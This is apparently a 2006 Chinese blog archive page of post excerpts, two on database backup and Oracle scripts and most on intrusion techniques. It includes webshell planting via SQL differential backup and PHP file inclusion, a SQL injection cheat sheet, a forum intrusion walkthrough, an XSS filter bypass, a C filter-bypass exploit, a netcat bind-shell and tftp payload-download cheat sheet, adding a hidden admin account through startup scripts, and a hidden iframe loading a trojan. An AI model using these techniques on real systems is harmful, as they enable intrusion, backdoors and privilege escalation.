您正在查看 "技术" 分类下的文章 2006-09-12 20:21 1.定时差异备份(时间设的小点)
2.数据库同步复制
<贴>
你可以用事物复制方式实现
=================================================
/*--备份数据库
--邹建 2003.10--*/
/*--调用示例
--备份当前数据库
exec p_backupdb @bkpath='c:\',@bkfname='db_\DATE\_db.bak'
--差异备份当前数据库
exec p_backupdb @bkpath='c:\',@bkfname='db_\DATE\_df.bak',@bktype='DF'
--备份当前数据库日志
exec p_backupdb @bkpath='c:\',@bkfname='db_\DATE\_log.bak',@bktype='LOG'
--*/
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[p_backupdb]') and OBJECTPROPERTY(id, N'IsProcedure') = 1)
drop procedure [dbo].[p_backupdb]
GO
create proc p_backupdb
@dbname sysname='',--要备份的数据库名称,不指定则备份当前数据库
@bkpath nvarchar(260)='',--备份文件的存放目录,不指定则使用SQL默认的备份目录
@bkfname nvarchar(260)='',--备 |
2006-08-29 22:24 from:http://www.wuxiasp.com 单位机房一台微机中含有重要文件的文件夹不见了,经过一番折腾,发现有人用文件的类标识符把它伪装成了打印机文件。问题找到了,但是要恢复原文件夹中的文件,也着实费了一番周折。由此受到启发,我们是否可以用类标识符来保护文件夹呢?本文就介绍一下如何用它来伪装文件夹以及如何恢复被伪装的文件夹内容。 文件的类标识符 计算机中的文件根据其内容不同分为许多类型,Windows通过注册表登记了这些文件的类型及其它信息。我们打开注册表编辑器,在HKEY_CLASSES_ROOT根键下面有一个子键CLSID(“类标识符”在Windows中的英文缩写),双击该子键会出现图1的窗口。
图1
在左窗格中显示的是各类文件的类标识符,有很多项,主要用来标识文件、程序、控件类型等对象;右窗格是左窗格对应内容的展开,可以用来检查各个类标识符所表示的文件类型。例如: {00020c01-0000-0000-c000-000000000046}是WAV文件类型; {2227a280-3aea-1 |
2006-08-11 2:39 swan's blog 差异备份最早提出来可能是??????或者什么人,最近安焦出的一本书上有过一些说法,应该存在问题,这里就不讨论了。关于备份本身的改进也没有什么好说的,只是单独提一下差异备份。
从感性上认识,差异备份就是把前后不同的地方提出来,这样对于成功率而言,确实有很大的提高,一个典型的过程是:
create table cmd(str image);
backup database xxxx to disk='somewhere';
insert into cmd(str) values ('something');
backup database xxxx to disk='destination' with differential,format
这里的差异,是一种增量差异,感性上的结果是增加的部分包括增加的记录项。
那么,我们考虑了,增加的记录项带来的差异较大呢,还是修改记录项带来差异大呢?很有可能是后者,那么,这个差异备份可以被改进为:
create table cmd(str image);
insert into cmd(str) values ('something');
backup database xxxx to disk='somewhere';
update xxxx set str='newthing';
backup database xxxx to disk='destination' with differential,format
马上测试一下,结果……大家自己看~
|
2006-08-11 2:35 from:http://www.521game.cn/blog 首先建立一PHP文件test.php 文件内容为:
$test=$_GET['test'];
@include 'test/'.$test;
?>
Txt文件一般都是说明文件,所以我们把一句话木马放到目录的说明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话木马粘贴到t.txt文件里。然后访问http://localhost/test/test.php?test=../t.txt如果你看到t.txt的内容就证明Ok了, 然后把在lanker微型PHP后门客户端 木马地址添入http://localhost/test/test.php?test=../t.txt密码里添入cmd就可以了,执行返回的结果都可以看到。
方法2现在的webshell是越来越流行了,连php的后门也追上来了,主要的有angel的phpspy和lanker的一句话后门!所以现在最主要的是怎么隐蔽我们的后门,想必看完我的文章大家都有自己各自的想法了。 其实lanker的一句话后门确实很强大,但是要用户使用客户端的话会带来一些不必要的麻烦,虽然可以使程序没有记录,(POST没记录的哦)但是对于一般的站点这其实并不是很重要。 有没与想过把phpspy插到一个文件里去呢?没有想过吗? 呵呵,跟我来,我们用记事本打开phspy就好了,搜索登 |
2006-07-26 2:08 翻译 by mix ---------------------------------|
|----------------和以前一样,我要申明一下,我不是专业的翻译员-----------------|
|---------所以我也只能够根据我自己的理解,尽量符合原文意思的进行翻译----------|
|------------有能力的朋友最好看原文,我的翻译只能作为一个参考而已-------------|
|------------翻译完后感觉基本上说清楚了这些事情,细节问题就难说了-------------|
- P H R A C K M A G A Z I N E -
Volume 0xa Issue 0x38
0x0a[0x10]
|------------------ 当我们完全控制CISCO路由器时能够做的事情 ------------------|
|-----------------------------------------------------------------------------|
|-------------------------- gauis <gaius@hert.org> ---------------------------|
----| 1. 声明
隧道技术(Tunnelx)是HERT(黑客紧急事件应急小组)努力研究开发的一套技术。他不是为了任何一个攻击者或信息防卫战而做的产品工具。严格的说,这只是作理论上的研究和论证罢了。
如果你是一个未被授权者,你没有权利保留该文的任 |
2006-07-26 1:57 from:http://my.donews. 这一篇文章纯属个人入侵的总结,并没有什么高深之处,第一次写文章,难免有一些错误或者你有什么新思路,请不吝指教! 在百度上搜索ckl inurl:asp,搜索出来的,只要是MSSQL数据库的就一定是db_owner权限以上,起码我还没看到过
public的,db_owner可是对当前连接的数据库拥有一切操作权利,可以执行select,update,delete.create.drop等命令.
在搜索出来的资料,找到一个china级的网站,是db_owner权限,浏览一下网站,发现上面上了一个动网7.1论坛,通过
whois.webhosting.info查询,发现还挂有一个网站,应当是个人主机,通过telnet target 80发现iis5.0的,windows2000的吧!
1,得到webshell
有两个思路.第一个是从网站着手
首先从暴表开始,找了一下发现user这个表示存放的动网的用户表,再暴这个表的字段,顺利找出管理员的用户名和密码,密码是md5加密,到www.xmd5.org是解一下,发现管理员还是有一些安全意识的,不是弱口令.那我们是
db_owner权限,可以update,还害怕什么!直接在注入点 |
2006-07-26 1:51 Sql注射总结(强烈推荐)
Sql注射总结(早源于'or'1'='1)
最重要的表名:
select * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses
最重要的一些用户名(默认sql数据库中存在着的)
public
dbo
guest(一般禁止,或者没权限)
db_sercurityadmin
ab_dlladmin
一些默认扩展
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia 驱动器相关
xp_dirtree 目录
xp_enumdsn ODBC连接
xp_loginconfig 服务器安全模式信息
xp_makecab 创建压缩卷
xp_ntsec_enumdomains domain信息
xp_terminate_process 终端进程,给出一个PID
例如:
sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'
exec xp_webserver
sp_dropextendedproc 'xp_webserver'
bcp "select |
2006-07-26 1:45 BY 寂寞的刺猬 [LoveShell] 前几天贴出了动网跨站的图片,原地址: http://www.loveshell.net/blog/blogview.asp?logID=108 今天简要说一下跨站形成的原因。 一、BOKE跨站 注:详细的原理及利用 请阅读 《黑客手册》 2006 年第八期。 在"CheckInput.asp"中,自定义函数"FormatCode()",过滤不严。 Public Function FormatCode(StrData) '提交格式化数据 ............ Re.Pattern = "<(\w*) class\s*=\s*([^>|\s]*)([^>]*)>" '以下是正则表达式,用于过滤提交数据 Str = re.Replace(Str,"<$1$3>") Re.Pattern = "<(\w*) style\s*=\s*([^>|\s]*)([^>]*)>" Str = re.Replace(Str,"<$1$3>") .............. FormatCode = Str End Function 其中过滤的是 < style=****>,而非 <style=****>,导致跨站代码可以写入BOKE文章及评论中。 在"book.asp"中,而显示文章及评论内容时,如果出现"Dv_FilterJS()"中定义的以下字符才会用"Server.HtmlEncode |
2006-07-20 7:41 by:cooldiyer /*
到国外几个网站看了几个牛人对这个漏洞的讨论,深有感触,写了个Exp,原理简单,高手飘过........
例子:ascii.exe hack.txt >hack.htm
漏洞与服务器无关、与客户端浏览器有关,当前通吃,是ASCII当然不支持汉字了,得记住哦
*/
#include <stdio.h>
int main(int argc,char** argv)
{
FILE *fp;
char ch;
printf("\n-- Bypassing of web filters by using ASCII Exploit By CoolDiyer --\n");
if(argc<2){
printf("\nUsage: \n\t %s srcfile >destfile\n",argv[0]);
return -1;
}
if((fp=fopen(argv[1],"r"))==NULL){
printf("File %s open Error",argv[1]);
|
2006-07-18 1:01 转自Jason's Blog regedit /s c:\server.reg 安静导入注册表
tftp -i myip get file.exe c:\file.exe tftp传送文件
f.exe <3389> <myip> <listen port> fport反相连接 Angleshell中工具
path\s.exe 43958 "net user mask mask /add"
nc ip port 正向连接
nc -l -p 2047 -t -e cmd.exe 绑定cmd在本机2047端口,t是telnet模式,e是程序定向
ntsd -c q -p PID 系统自带杀进程命令
------特殊文件夹整套命令-------
md c:aux\ 建立aux目录
copy muma.exe \\.\c:\aux\\ 拷贝muma.exe到aux目录
copy muma.exe \\.\c:\aux\\con.exe 拷贝换名保存
cmd /c \\.\c:\aux\\con.exe 运行的命令
del \\.\c:\aux\con.exe 删除con.exe文件
rd \\.\c:\aux\ 删除这个目录
|
2006-07-17 18:22 文章作者:OnlyVeR
信息来源:邪恶八进制信息安全团队(www.eviloctal.com )
组策略启动脚本;
利用过程:启动组策略(运行->gpedit.msc->计算机配置->Windows 设置->脚本(启动/关机) )
启动与关机相关设置;
选择启动->属性->添加 会弹出选择脚本名
选择程序 C:\windows\system32\net.exe 参数 user admin /add 来执行 net user admin /add
再同样添加C:\Windows\system32\net.exe localgroup administrators admin /add
来执行 net localgroup administrators admin /add
{ .老鸟跑出来say:TMD这都是费话,net user早懂了 砰的一声 (PS:我脑袋被拍个包来了) }
费话少说: 在经过进一步了解的时候发现这里是由
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\scripts.ini
(PS:默认是隐藏的.) 来控制 shutdown 和 Startup 的.
ini组成方式如下
------------------------------
[Startup] |
2006-07-17 18:20 Oracle中的数据字典是数据库中的非常重要的一部分,提供了相关数据库的信息,它是所有Oracle用户(从应用的最终用户、应用的设计开发者到数据库管理员)的非常重要的信息来源。数据字典的创建,是在Oracle数据库创建完毕后,运行一些相关的数据库管理脚本来完成的。当采用Oracle统一安装器(Oracle Universal Installer)创建数据库时,Oracle服务器有关的字典视图和脚本最后会被自动安装。但当需要升级目前的Oracle数据库服务器时,数据库管理员必须要手工重新运行创建这些视图或脚本的SQL。安装完数据库后,Oracle数据库管理脚本就存放在操作系统中。对于UNIX和NT操作系统,分别位于不同的物理目录下,见表1所示:
操作系统 脚本目录位置
UNIX $ORACLE_HOME/rdbms/admin
NT %ORACLE_HOME%\rdbms\admin
表1 数据库管理脚本在操作系统中的物理位置
Oracle中几乎所有的系统管理脚本都保存在该文件目录下,该目录下含有上百个不同文件。这些不同的文件都有什么作用呢?本文将详细讨论组成Oracle数据库管理脚本的命名规范。这样用户看到某个文件大概就可以知道该文件主要用途是什么。该目录下的文件按照功能不同可 |
2006-07-17 18:16 来源:黑客手册 从WIN2000到WIN XP, 再到WIN2003, MS IIS服务器安全性的提高是显而易见的。 在WIN2000中, 一个普通的PHP SHELL便能把它打垮; 在WIN XP, 即使Safe mode = off,你也无法用system() 等函数执行系统命令, 但是我们还能用com()函数进行突破;到WIN 2003,即使IIS 和PHP都是默认安装,你用system(), com()也可能拿它没辙。这时候你就不得不使用一些新的方法来进行突破了。
1、disable_functions的突破
在php-4.0.1以上的版本,php.ini里引入了一项功能disable_functions , 这个功能比较有用,可以用它禁止一些函数。比如在php.ini里加上disable_functions = passthru exec system popen 那么在执行这些函数的时候将会提示Warning: system() has been disabled for security reasons, 同时程序终止运行。但是也不是没有办法执行系统命令了。因为php采用了很多perl的特性,比如还可以用(`)来执行命令,示例代码如下:
<?
$output = `ls -al`;
echo "<pre>$output</pre>";
?>
据说这个只有设成safe_mode为on才能避免,但上次我在一台国外的服务器上使用的时候还是失败了,人并不是什么时候 |
2006-07-17 16:25 转自:安全中国论坛
大家都知道最长用的几种权限提升方法
我们主要说一下利用autorun .inf或desktop.ini,
这种方法有很大的局限性,必须管理员打开目录或文件夹,现在国内的有些管理员不知道猴年马月才登陆服务器一次,成功率不是太高!
我们来讲一下,怎么主动利用这个方法desktop.ini提升权限! 我在本机器上个大家演示:
我们首先创建个 guests的用户 命令:runas /user:admin cmd.exe
现在就是guests权限,我们来看一下看到了么
现在我们建立一个 有自定义文件
我现在是在本机操作,大家用webshell的时候可是把最后的两个文件上传到一个有运行权限的目录里面
<body color:infotext; margin-top:1; font:menu">
<iframe src="填入你的木马地址" name="xyxiao" width="0" height="0" frameborder="0"></iframe>
</body>
也可以直接填入
<iframe src="http://www.zz.ha.cn" name="xyxiao" width="0" height="0" frameborder="0"></iframe> 我们随便选个地址 会产生两个文件一个文件夹 desktop.ini , |
2006-07-16 19:59 | | |
